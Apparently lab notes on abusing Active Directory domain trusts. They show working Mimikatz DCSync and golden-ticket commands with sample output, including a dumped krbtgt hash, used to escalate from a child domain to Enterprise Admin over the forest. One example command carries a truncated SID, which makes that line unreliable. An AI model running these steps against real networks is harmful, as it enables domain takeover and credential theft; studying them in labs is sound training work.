Domain Trusts

info

The Key Concept of Exploiting Domain Trusts is if we take control over the Root Domain we will be in a Position to Compromise all of Regional Domains.

Domain Trusts are a Mechanism for Users in the Network to gain access to other resources in the Domain.

For the most part, trusts outline how the Domain's inside of a Forest Communicate with each other. In some Environments, trusts can be extended out to External Domains and even Forests in some cases. (Forest is a Collection of one or more Domain Trees inside an AD Network)

There are Two main Types of Trusts that can be Configured between Domains:

• Directional - The Direction of the Trust flows from a Trusting Domain to a Trusted Domain
• Transitive - The Trust Relationship expands beyond just two Domains to include other Trusted Domains

KRBTGT and Golden Tickets

Required Privileges: Administrators

KRBTGT is the account used for Microsoft's implementation of Kerberos. This account acts as the Service Account for the Kerberos Distribution Center (KDC) Service, which handles all Kerberos Ticket Requests. This Account is used to Encrypt and sign all Kerberos Tickets for the Domain. Since the Password Hash is shared by all Domain Controllers, they can then Verify the Authenticity of the received TGT when Users Request access to Resources.

If we want to Generate our own TGT's to grant us Access to everything, this is known as a Golden Ticket Attack. In a Golden Ticket Attack, we bypass the KDC altogether and create our own TGT's, essentially becoming a Ticket Granting Server (TGS).

In order to forge TGT's, we need the following Information:

• FQDN of the Domain
• Security Identifier (SID) of the domain
• Username of the Account we want to Impersonate
• KRBTGT Password Hash

KRBTGT Requires a Domain Compromise since the KRBTGT Password Hash is only stored on Domain Controllers

Mimikatz

privilege::debug
lsadump::dcsync /user:za\krbtgt

Output

[DC] 'za.adobe.loc'       Will be the Domain 
[DC] 'THMDC.za.adobe.loc' Will be the DC Server 
[DC] 'za\krbtgt'          Will be the User Account           
[rpc] Service  : ldap                               
[rpc] AuthnSvc : GSS_NEGOTIATE (9)                  

Object RDN           : krbtgt                   
                                                
** SAM ACCOUNT **                               
                                                
SAM Username         : krbtgt                   
Account Type         : 30000000 ( USER_OBJECT ) 
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )    
Account expiration   :                                               
Password last change : 4/25/2022 6:18:22 PM                          
Object Security ID   : S-1-5-21-3885271727-2693558621-2658995185-502 
Object Relative ID   : 502                                           
                                                                     
Credentials:                                                         
  Hash NTLM: 16f9af38fca3ada405386b3b57366082                        
    ntlm- 0: 16f9af38fca3ada405386b3b57366082 
    lm  - 0: 35c7b671efe40860dc078afd2786c902 
                                              
[...]

Inter-Realm TGT's

Using the KRBTGT Password Hash, we could now forge a Golden Ticket to access any Resource in the Child Domain.

We can take this a step further by forging an Inter-Realm TGT. Inter-Realm TGT's are used to provide access to resources in other Domains. (Like Exploiting the Bidirectional trust Relationship between the Child and Parent Domain to gain full Access to the Parent Domain)

To do this we need to include extra account SID's from other Domains when we construct the Golden Ticket to perform this Exploit.

We will Exploit the Trust the Parent Domain has with our Child Domain by adding the SID of the Enterprise Admins (EA) group as an extra SID to our forged Ticket for the Domain Controller of the Child Domain. The EA Group belongs to the Parent Domain and Membership to this Group essentially grants Administrative Privileges over the entire Forest.

To exploit this, we need to recover two SID's:

• SID of the Child Domain Controller (In this Scenario THMDC), which we will Impersonate in our forged TGT
• SID of the Enterprise Admins in the Parent Domain, which we will add as an extra SID to our forged TGT

PSH

# Name of the Child Domain Controller [In this Scenario THMDC]
Get-ADComputer -Identity "THMDC"

# Recover the SID of the Enterprise Admins Group to Query the Parent Domain Controller [In this Scenario thmrootdc.adobe.loc]
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.adobe.loc

Get-ADComputer

DistinguishedName : CN=THMDC,OU=Domain Controllers,DC=za,DC=adobe,DC=loc
DNSHostName       : THMDC.za.adobe.loc
Enabled           : True
Name              : THMDC
ObjectClass       : computer
ObjectGUID        : bd651750-782b-4b09-93b4-b5987ec7311b
SamAccountName    : THMDC$
SID               : S-1-5-21-3885271727-2693558621-2658995185-1001
UserPrincipalName :

Get-ADGroup

DistinguishedName : CN=Enterprise Admins,CN=Users,DC=adobe,DC=loc
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : a23ae384-16e8-44d5-9b36-8173c4e0e5de
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-519

Exploiting Domain Trusts

We can use Mimikatz to generate the Golden Ticket.

Mimikatz

privilege::debug
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password Hash of krbtgt User> /sids:<SID of Enterprise Admins Group> /ptt

:: Query Example in this Scenario
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-63

Output

User      : Administrator
Domain    : za.adobe.loc (ZA)
SID       : S-1-5-21-3885271727-2693558621-2658995185-1001
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3330634377-1326264276-632209373-519 ;
ServiceKey: 16f9af38fca3ada405386b3b57366082 - rc4_hmac_nt
Service   : krbtgt
Lifetime  : 1/12/2023 12:09:18 AM ; 1/9/2033 12:09:18 AM ; 1/9/2033 12:09:18 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ za.adobe.loc' Successfully submitted for Current Session.

Verifying the Access

First, we will Verify that this Ticket works for access to THMDC since it is a Valid Ticket for the Administrator User of the Child Domain. This is going to Confirm that the Golden Ticket was forged for access to the Child DC.

We can also Verify that the Tickets were correctly Injected with the Windows Built-In Command klist.

:: List Target Machine Contents
dir \\thmdc.za.adobe.loc\c$

:: Displays a list of currently Cached Kerberos Tickets
klist

If we specified extra SID's we should also now have Access to the Parent DC.

:: List Target Machine Contents
dir \\thmrootdc.adobe.loc\c$\